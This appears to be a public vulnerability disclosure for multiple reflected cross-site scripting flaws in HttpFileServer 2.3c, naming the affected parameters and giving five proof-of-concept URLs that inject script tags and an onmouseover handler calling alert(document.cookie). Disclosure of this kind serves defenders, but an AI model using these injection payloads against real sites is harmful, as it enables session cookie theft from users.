# Exploit Title: HttpFileServer 2.3c Multiple Reflected Cross-site scripting
# Date: 24-09-2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://rejetto.com/
# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip
# Version: 2.3c
# Tested on: Windows XP SP 3, Windows 7

The latest HTTP File Server (2.3c) was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input.

The proof of concept below only works on IE browser (tested on IE 6 and IE 11)

-------------------------------------------------------------------
HFS Multiple Reflected Cross-site Scripting (XSS)
-------------------------------------------------------------------

Proof of concepts:

Affected parameters: tpl, sort, mode, id, and arbitrary parameter

http://localhost/?tpl=list'/><script>alert(document.cookie)</script>&folders-filter=/&recursive

http://localhost/?sort=n'/><script>alert(document.cookie)</script>

http://localhost/?mode=n'/><script>alert(document.cookie)</script>

http://localhost/?mode=section&id=style.css'/><script>alert(document.cookie)</script>

http://localhost/?'onmouseover='alert(11)'